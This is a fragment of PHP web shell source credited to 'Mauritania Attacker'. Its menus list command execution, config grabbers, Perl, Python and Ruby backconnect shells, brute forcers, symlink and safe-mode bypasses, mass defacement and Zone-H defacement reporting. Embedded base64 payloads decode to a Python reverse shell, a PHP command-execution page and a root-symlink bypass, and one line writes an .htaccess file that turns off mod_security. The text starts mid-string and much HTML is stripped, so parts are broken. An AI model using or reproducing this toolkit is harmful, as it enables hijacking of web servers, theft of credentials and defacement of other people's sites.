PSMwMGJiMDAgc2l6ZT0yIGZhY2U9J0NvdXJpZXIgTmV3Jz48Yj5CeXBhc3NlZCBTdWNjZXNzZnVsbHk8L2I+PC9mb250PjwvYT4iOyANCmVjaG8gIjxicj48YnI+PGI+RG9uZS4uICE8L2I+PGJyPjxicj5DaGVjayBsaW5rIGdpdmVuIGJlbG93IGZvciAvIGZvbGRlciBzeW1saW5rIDxicj4kcnQ8L2NlbnRlcj4iO30gZWNobyAiPC9mb3JtPiI7ICA/PjwvdGQ+PC90cj48L2JvZHk+PC9odG1sPg=='; $file = fopen("shellexcexce.php" ,"w+"); $write = fwrite ($file ,base64_decode($shellexcexce)); fclose($file); chmod("shellexcexce.php",0755); echo ""; } if(isset($_GET['action']) && $_GET['action'] == 'subdomainchkrezes'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo '
Subdomain Checker

'; echo'

'; set_time_limit(0); $subs = array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","lan","phpmyadmin","administrator","mape","isp","shop","rex","podcast","potraga","sensation","igre","foo","api","access","ulaz","pam","sport","pretraga","pricaonica","kuvar","raketa","wwwmobile","s1","s2","foro","s3","box","open","abc","phpbb3","phpbb2","internet","phpbb","whm","mysql","webadmin","adm","admin","admins","agent","aix","recnik","alerts","av","antivirus","app","apps","appserver","archive","as400","auto","backup","banking","bbdd","bbs","bea","beta","blog","catalog","cgi","channel","channels","chat","cisco","client","clients","club","cluster","clusters","code","commerce","community","compaq","conole","consumer","contact","contracts","corporate","ceo","cso","cust","customer","cpanel","data","bd","db2","default","demo","cms","design","desktop","dev","develop","developer","device","dial","digital","dir","directory","disc","discovery","disk","dns","dns1","dns2","dns3","docs","poslovi","prijemni","znanje","mojtim","documents","domain","domains","dominoweb","download","downloads","ecommerce","e-commerce","edi","edu","education","email","enable","engine","engineer","enterprise","slike","galerija","error","event","events","example","exchange","extern","external","extranet","fax","field","finance","firewall","forum","forums","fsp","ftp","ftp2","fw","fw1","gallery","galleries","games","gateway","gopher","guest","gw","hello","helloworld","help","helpdesk","arkiva","lajme","faqe","helponline","hp","ibm","ibmdb","ids","ILMI","film","navigator","nalog","prodavnica","zdravlje","reklamiranje","zivot","images","imap","pomoc","imap4","img","imgs","info","intern","internal","intranet","invalid","iphone","ipsec","irc","ircserver","jobs","ldap","link","linux","lists","listserver","local","localhost","log","logs","login","lotus","mail","mailboxes","mailhost","result","management","manage","manager","map","maps","marketing","device","media","member","members","messenger","mngt","mobile","monitor","multimedia","music","my","names","lojra","albania","bisedo","puka","foto","emra","njohje","vip","egea-tirana","historia","forumi","vesti","administracija","net","new1","new","perkohesisht","netdata","netstats","network","news","nms","nntp","ns","ns1","ns2","ns3","ntp","online","openview","oracle","outlook","page","pages","partner","partners","pda","personal","ph","pictures","pix","pop","pop3","portal","press","print","printer","private","project","projects","proxy","public","ra","radio","raptor","ras","read","register","remote","report","reports","root","router","lister","rwhois","sac","schedules","scotty","search","secret","secure","security","seri","serv","serv2","server","service","services","shop","shopping","site","sms","smtp","smtphost","snmp","snmpd","snort","solaris","1","2","3","4","5","6","7","8","9","0","solutions","support","source","sql","ssl","stats","store","stream","streaming","sun","support","switch","sysback","system","tech","terminal","test","testing","testing123","time","tivoli","training","transfers","uddi","update","upload","uploads","video","vpn","w1","w2","w3","wais","wap","web","webdocs","weblib","weblogic","webmail","webserver","webservices","websphere","whois","wireless","work","world","write","ws","ws1","ws2","ws3","www1","www2","www3","www4","www5","www6","www7","www8","www9","drupal","wordpress","joomla","db","database","love"); if($_POST){ $url = $_POST["site"]; foreach($subs as $sub){ if(!eregi($url, gethostbyname($sub.".".$url))){ echo '[+] '.$sub.".".$url.' : '.gethostbyname($sub.".".$url).'
'; }else{ echo '[+] '.$sub.".".$url.' : Nothing Found
'; } } } } echo''; if(isset($_GET['action']) && $_GET['action'] == 'wpidxcngrdesr'){ echo '
Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer
'; echo '
Generate Wordpress Index Changer

'; error_reporting(0); echo "

Cwd     
Script   



"; echo "

";
$rt="
Link"; echo "

Click on Button Generate Now and Check link given below for Wordpress Script
$rt
"; echo '

Generator Coded by Mauritania Attacker

'; } if(isset($_GET['action']) && $_GET['action'] == 'shhhshell'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; //extract shtml shell $ROFL = ''; $file = fopen("shell.shtml" ,"w+"); $write = fwrite ($file ,base64_decode($ROFL)); fclose($file); echo "
Shtml Shell Command

"; } if(isset($_GET['action']) && $_GET['action'] == 'joommlallainxc'){ echo '
Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin Mass WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer
'; //extract joomla index changer $coddd = ''; $file = fopen("zjommindexz.php" ,"w+"); $write = fwrite ($file ,base64_decode($coddd)); fclose($file); echo "
Joomla Index Changer
"; } if(isset($_GET['action']) && $_GET['action'] == 'joomlarvrssrvetll'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo '
Joomla Reverse Server

'; echo '


'; function mbing($what){ for($i = 1; $i <= 2000; $i += 10){ $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".str_replace(" ","+", $what)."&first=$i"); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16"); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt'); curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt'); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); $data = curl_exec($ch); preg_match_all('#

MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit

'; echo"
Wordpress Reverse Server

"; echo '


'; function mbing($what){ for($i = 1; $i <= 2000; $i += 10){ $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".str_replace(" ","+", $what)."&first=$i"); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16"); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt'); curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt'); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); $data = curl_exec($ch); preg_match_all('#


MySQL & PostgreSql Connect

Command Execution

Base64 Command

Config Grabber

Subdomain Checker

Joomla Reverse Server

Wordpress Reverse Server

Find Directory Writable/Readable

Zone-h Notifier

Shtml Command Shell

Back connect Simple

Ruby BackConnect

Perl BackConnect

Python BackConnect

Exploit

Whcms Killer

Webmail Password Changer

Wordpress Csrf Exploit


Symlink Info

Cms Scanner

Perl based symlink

Symlink Manual

Manually Retrieve Config

Enable Symlink If Disabled

Python Bypass Forbidden Via TCP Protocol

Symlink Bypass 2014


Skype Brute Force

Cpanel Brute Force

Joomla Brute Force

Wordpress Brute Force

Twitter Brute Force

Gmail & Hotmail Brute Force

Ftp Bruteforce


Bypass /etc/passwd

Bypass Users Server

Bypass Perl Security

Bypass Root Path with Zip File

Bypass Root Path with system function

Bypass Root Path with exec function

Bypass Root Path with shell_exec function

Bypass posix_getpwuid

Bypass PHP Suhosin function blacklist

Bypass Functions suPHP_ConfigPath

Bypass suPHP Security

Simple Bypasser

Read Files

Bypass Chmod Directory

Bypass Forbidden 2014

Bypass SafeMode 2014 Priv8



Mass Deface Dirs

Mass Change Admin Joomla

Mass Change Admin vBulletin

Mass Change Admin Mass WordPress

Wordpress & Joomla Mass Deface

Wordpress Hijack Index Priv8

Joomla Index Changer

Wordpress Index Changer

Cpanel & Ftp Auto Defacer


Bypass Server Security Functions

Test Permission

Server Infos

Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer

'; //extract script $gfgf4fff = ''; $file = fopen("massjmlawrdprsss.php" ,"w+"); $write = fwrite ($file ,base64_decode($gfgf4fff)); fclose($file); echo "
Wordpress & Joomla Mass Defacer

"; } // tools if(isset($_GET['action']) && $_GET['action'] == 'zone-h' && !empty($_POST['hackmode'])){ if($_POST['SendNowToZoneH']) { echo '
'; ob_start(); $sub = get_loaded_extensions(); if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");} elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");} elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");} elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];} ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !\n"; ++$i; } echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! "; } echo '
'; } if(isset($_GET['action']) && $_GET['action'] == 'pythnonbakcncete'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; mkdir('pyrevrshell', 0755); chdir('pyrevrshell'); $seropil = ".htaccess"; $angelinalll = "$seropil"; $shitttyz = fopen ($angelinalll , 'w') or die ("shitttyz açılamadı!"); $dffvfdgfg = " SecFilterEngine Off SecFilterScanPOST Off "; fwrite ( $shitttyz , $dffvfdgfg ) ; fclose ($shitttyz); //extract python reverse script $vkffhd = 'IyEvdXNyL2Jpbi9weXRob24NCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHNvY2tldA0KaW1wb3J0IHB0eQ0KIA0Kc2hlbGwgPSAiL2Jpbi9zaCINCiANCmRlZiB1c2FnZShwcm9ncmFtbmFtZSk6DQpwcmludCAieXRob24gY29ubmVjdC1iYWNrIGRvb3IiDQpwcmludCAiVXNhZ2U6ICVzIDxjb25uX2JhY2tfaXA+IDxwb3J0PiIgJSBwcm9ncmFtbmFtZQ0KIA0KZGVmIG1haW4oKToNCmlmIGxlbihzeXMuYXJndikgIT0zOg0KdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQpzeXMuZXhpdCgxKQ0KIA0KcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KIA0KdHJ5Og0Kcy5jb25uZWN0KChzb2NrZXQuZ2V0aG9zdGJ5bmFtZShzeXMuYXJndlsxXSksaW50KHN5cy5hcmd2WzJdKSkpDQpwcmludCAiWytdQ29ubmVjdCBPSy4iDQpleGNlcHQ6DQpwcmludCAiWy1dQ2FuJ3QgY29ubmVjdCINCnN5cy5leGl0KDIpDQogDQpvcy5kdXAyKHMuZmlsZW5vKCksMCkNCm9zLmR1cDIocy5maWxlbm8oKSwxKQ0Kb3MuZHVwMihzLmZpbGVubygpLDIpDQpnbG9iYWwgc2hlbGwNCm9zLnVuc2V0ZW52KCJISVNURklMRSIpDQpvcy51bnNldGVudigiSElTVEZJTEVTSVpFIikNCnB0eS5zcGF3bihzaGVsbCkNCnMuY2xvc2UoKQ0KIA0KaWYgX19uYW1lX18gPT0gIl9fbWFpbl9fIjoNCm1haW4oKQ=='; $jkol = fopen("reversesh.py" ,"w+"); $write = fwrite ($jkol ,base64_decode($vkffhd)); fclose($jkol); chmod("reversesh.py",0755); //extract php command shell $merdeeeee = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQeXRob24gQ29ubmVjdCBTaGVsbCBQcml2ODwvdGl0bGU+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3MTQuMHp6MC5jb20vMjAxNC8wNi8wNC8yMS8zOTY1NTQzOTQucG5nIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7IGJhY2tncm91bmQtY29sb3I6ICMyMjIyMjIgIWltcG9ydGFudDsgY29sb3I6ICMwMDk5MDA7IHRleHQtc2hhZG93OiMwMDAgMHB4IDJweCA3cHg7fSAgICAgIGF7dGV4dC1kZWNvcmF0aW9uOm5vbmU7IGZvbnQtZmFtaWx5OiBUYWhvbWEsIEdlbmV2YTsgY29sb3I6IzAwNzcwMDsgcGFkZGluZzoycHggMnB4O30gICAgICBhOmhvdmVye2NvbG9yOiMwMDk5MDA7IHRleHQtc2hhZG93OiMwMGZmMDAgMHB4IDBweCAzcHg7fQkgIC5hcmVhIHsgY29sb3I6ICMwMGJiMDA7IGZvbnQtc2l6ZTogOXB0OyB0ZXh0LXNoYWRvdzojMDAwMDAwIDBweCAycHggN3B4OyBib3JkZXI6IHNvbGlkIDBweCAjMDA3NzAwOyBiYWNrZ3JvdW5kLWNvbG9yOnRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA5OTAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDAsMTE5LDApIDBweCAwcHggNHB4OyB9CSAgaW5wdXRbdHlwZT1zdWJtaXRdeyBwYWRkaW5nOiAzcHg7IGNvbG9yOiAjMDA3NzA7ICBmb250LXdlaWdodDogYm9sZDsgdGV4dC1hbGlnbjogY2VudGVyOyAgdGV4dC1zaGFkb3c6IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC4zKTsgIGJhY2tncm91bmQ6ICNhZWFlYWU7ICBiYWNrZ3JvdW5kLWNsaXA6IHBhZGRpbmctYm94OyAgYm9yZGVyOiAxcHggc29saWQgIzI4NDQ3MzsgIGJvcmRlci1ib3R0b20tY29sb3I6ICMyMjNiNjY7ICBib3JkZXItcmFkaXVzOiA0cHg7ICBjdXJzb3I6IHBvaW50ZXI7ICBiYWNrZ3JvdW5kLWltYWdlOi13ZWJraXQtbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiAtbW96LWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogLW8tbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiBsaW5lYXItZ3JhZGllbnQodG8gYm90dG9tLCAjZWFlYWVhLCAjZDBkMGQwKTsgIC13ZWJraXQtYm94LXNoYWRvdzogaW5zZXQgMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjUpLCBpbnNldCAwIDAgN3B4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC40KSwgMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4xNSk7ICBib3gtc2hhZG93OiBpbnNldCAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNSksIGluc2V0IDAgMCA3cHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjQpLCAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjE1KTsgfSBpbnB1dFt0eXBlPXRleHRdeyBwYWRkaW5nOiAzcHg7IGNvbG9yOiAjMDA5OTAwOyB0ZXh0LXNoYWRvdzogIzc3Nzc3NyAwcHggMHB4IDNweDsgYm9yZGVyOiAxcHggc29saWQgIzAwNzcwMDsgYmFja2dyb3VuZDogdHJhbnNwYXJlbnQ7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMDc3MDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoODUsODUsODUpIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDg1LDg1LDg1KSAwcHggMHB4IDRweDt9IGlucHV0W3R5cGU9c3VibWl0XTpob3ZlciwgaW5wdXRbdHlwZT10ZXh0XTpob3ZlcnsgY29sb3I6ICNmZmZmZmY7IHRleHQtc2hhZG93OiAjMDA2NjAwIDBweCAwcHggNHB4OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBkZDAwOyBib3JkZXI6IDFweCBzb2xpZCAjMDBkZDAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7fSBzZWxlY3R7IHBhZGRpbmc6IDNweDsgd2lkdGg6IDE2MnB4OyBjb2xvcjogIzAwYWEwMDsgdGV4dC1zaGFkb3c6IzAwMCAwcHggMnB4IDdweDsgYm9yZGVyOiAxcHggc29saWQgIzAwNzcwMDsgYmFja2dyb3VuZDogdHJhbnNwYXJlbnQ7IHRleHQtZGVjb3JhdGlvbjogbm9uZTsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwYWEwMDsgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoODUsIDg1LCA4NSkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoODUsIDg1LCA4NSkgMHB4IDBweCA0cHg7fSBzZWxlY3Q6aG92ZXJ7IGJvcmRlcjogMXB4IHNvbGlkICMwMGRkMDA7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGRkMDA7ICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4O30gICAjY29tbWFuZHN7IG1hcmdpbi1sZWZ0OiAzNTBweDsgbWFyZ2luLXJpZ2h0OiAzNTBweDsgfSBvcHRpb257IGNvbG9yOiAjNzc3Nzc3OyB9PC9zdHlsZT4NCjw/cGhwDQplY2hvICc8Y2VudGVyPjxmb250IGNvbG9yPSIjMDA3NzAwIiBmYWNlPSJUYWhvbWEiIHN0eWxlPSJmb250LXNpemU6IDEycHQiPlVzYWdlOiByZXZlcnNlc2gucHkgW0hvc3RdIFtQb3J0XTwvZm9udD4nOw0KZWNobyc8cCBhbGlnbj0iY2VudGVyIj4gDQo8aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vd3d3MTAuMHp6MC5jb20vMjAxNC8wOC8yMC8yMC8yMjU4MTYzNTUucG5nIj48L3A+PGZvbnQgZmFjZT0iR2VuZXZhIiBhbGlnbj0iY2VudGVyIiBzaXplPSIyIiBjb2xvcj0iIzAwOTkwMCI+IENvZGVkIEJ5IE1hdXJpdGFuaWEgQXR0YWNrZXIgPC9mb250Pjxicj4NCjxmb3JtIG1ldGhvZD1nZXQgYWN0aW9uPSInLiRtZS4nIj4NCjxwPjx0ZXh0YXJlYSBjbGFzcz0iYXJlYSIgcm93cz0iMTMiIG5hbWU9IlMxIiBjb2xzPSI3MCIgPic7DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddIT0icG9wZW4iKXsNCmVjaG8gJF9HRVRbJ2V4ZWNtZXRob2QnXSgkX0dFVFsnY29tbWFuZCddKTt9DQppZiAoc3RybGVuKCRfUE9TVFsnY29tbWFuZCddKT4xICYmICRfUE9TVFsnZXhlY21ldGhvZCddIT0icG9wZW4iKXsNCmVjaG8gJF9QT1NUWydleGVjbWV0aG9kJ10oJF9QT1NUWydjb21tYW5kJ10pO30NCg0KaWYgKHN0cmxlbigkX0dFVFsnY29tbWFuZCddKT4xICYmICRfR0VUWydleGVjbWV0aG9kJ109PSJwb3BlbiIpew0KcG9wZW4oJF9HRVRbJ2NvbW1hbmQnXSwiciIpO30NCg0KZWNobyc8L3RleHRhcmVhPjwvcD4NCjxwPjxjZW50ZXI+SWYgbm90aGluZyB3b3JrIGl0IG1lYW5zIHRoYXQgcHl0aG9uIGlzIG5vdCBlbmFibGVkIGluIHRoaXMgc2VydmVyIDooPC9jZW50ZXI+PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PHN0cm9uZz5Db21tYW5kOiBweXRob24gcmV2ZXJzZS5weSB5b3VySVAgUG9ydDwvc3Ryb25nPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPSJ2dyIgc2l6ZT0iNTAiIHZhbHVlPSJjbWQiPiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY29tbWFuZCIgc2l6ZT0iNDMiPiA8c2VsZWN0IG5hbWU9ZXhlY21ldGhvZD4NCjxvcHRpb24gdmFsdWU9InN5c3RlbSI+U3lzdGVtPC9vcHRpb24+ICA8b3B0aW9uIHZhbHVlPSJleGVjIj5FeGVjPC9vcHRpb24+ICA8b3B0aW9uIHZhbHVlPSJwYXNzdGhydSI+UGFzc3RocnU8L29wdGlvbj48b3B0aW9uIHZhbHVlPSJwb3BlbiI+cG9wZW48L29wdGlvbj4NCjwvc2VsZWN0PiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlY3V0ZSI+DQo8L3A+PC9mb3JtPic7DQo/Pg=='; $file = fopen("kiter.php" ,"w+"); $write = fwrite ($file ,base64_decode($merdeeeee)); fclose($file); echo '
Python Connect Shell Priv8

'; } if(isset($_GET['action']) && $_GET['action'] == 'rootexecbpass'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass Root Path With exec Function

'; mkdir('excrooooot', 0755); chdir('excrooooot'); $excrooooot = 'PGhlYWQ+DQo8dGl0bGU+QnlwYXNzIEJ5cGFzcyBSb290IFBhdGggYnkgTWF1cml0YW5pYSBBdHRhY2tlcjwvdGl0bGU+DQo8L2hlYWQ+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vYy91L2N1MWJtcGdiMWsuaWNvIiB0eXBlPSJpbWFnZS94LWljb24iIC8+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPjwhLS0gYm9keSB7YmFja2dyb3VuZC1jb2xvcjogdHJhbnNwYXJlbnQ7IGZvbnQtZmFtaWx5OkNvdXJpZXIJbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRvcDogMHB4OyB0ZXh0LWFsaWduOiBjZW50ZXI7IE5ldztmb250LXNpemU6MTJweDtjb2xvcjojMDA4ODAwO2ZvbnQtd2VpZ2h0OjQwMDt9IGF7dGV4dC1kZWNvcmF0aW9uOm5vbmU7fSBhOmxpbmsge2NvbG9yOiMwMDk5MDA7fSBhOnZpc2l0ZWQge2NvbG9yOiMwMDg4MDA7fSBhOmhvdmVye2NvbG9yOiMwMGJiMDA7fSBhOmFjdGl2ZSB7Y29sb3I6IzAwOTkwMDt9IC0tPjwhLS0gTWFkZSBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIC0tPg0KPC9zdHlsZT48YnI+PGJyPjxib2R5IGJnQ29sb3I9IjAwMDAwMCI+PHRyPjx0ZD48P3BocCBlY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGFjdGlvbj0nJz4iIDsgDQplY2hvICI8Y2VudGVyPjxpbnB1dCB0eXBlPSdzdWJtaXQnIHZhbHVlPSdCeXBhc3MgaXQnIG5hbWU9J2V4ZWNlcic+PC9jZW50ZXI+IjsgDQppZiAoaXNzZXQoJF9QT1NUWydleGVjZXInXSkpeyBleGVjKCdsbiAtcyAvIHJvb3QtZXhlYy50eHQnKTsgDQokZnZja2VtID0nVDNCMGFXOXVjeUJKYm1SbGVHVnpJRVp2Ykd4dmQxTjViVXhwYm10ekRRcEVhWEpsWTNSdmNubEpibVJsZUNCemMzTnpjM011YUhSdERRcEJaR1JVZVhCbElIUjRkQ0F1Y0dod0RRcEJaR1JJWVc1a2JHVnlJSFI0ZENBdWNHaHcnOyANCiRmaWxlID0gZm9wZW4oIi5odGFjY2VzcyIsIncrIik7ICR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLGJhc2U2NF9kZWNvZGUoJGZ2Y2tlbSkpOyAkZXhlY2VyID0gc3ltbGluaygiLyIsInJvb3QtZXhlYy50eHQiKTsgDQokcnQ9Ijxicj48YSBocmVmPXJvb3QtZXhlYy50eHQgVEFSR0VUPSdfYmxhbmsnPjxmb250IGNvbG9yPSMwMGJiMDAgc2l6ZT0yIGZhY2U9J0NvdXJpZXIgTmV3Jz48Yj5CeXBhc3NlZCBTdWNjZXNzZnVsbHk8L2I+PC9mb250PjwvYT4iOyANCmVjaG8gIjxicj48YnI+PGI+RG9uZS4uICE8L2I+PGJyPjxicj5DaGVjayBsaW5rIGdpdmVuIGJlbG93IGZvciAvIGZvbGRlciBzeW1saW5rIDxicj4kcnQ8L2NlbnRlcj4iO30gZWNobyAiPC9mb3JtPiI7ICA/PjwvdGQ+PC90cj48L2JvZHk+PC9odG1sPg=='; $file = fopen("excrooooot.php" ,"w+"); $write = fwrite ($file ,base64_decode($excrooooot)); fclose($file); chmod("excrooooot.php",0755); echo ""; } if(isset($_GET['action']) && $_GET['action'] == 'bypsrootwzp'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo'
Bypass Root Path With Zip File
Coded By Mauritania Attacker
'; echo"

"; echo'
'; echo"

Remote Zip File

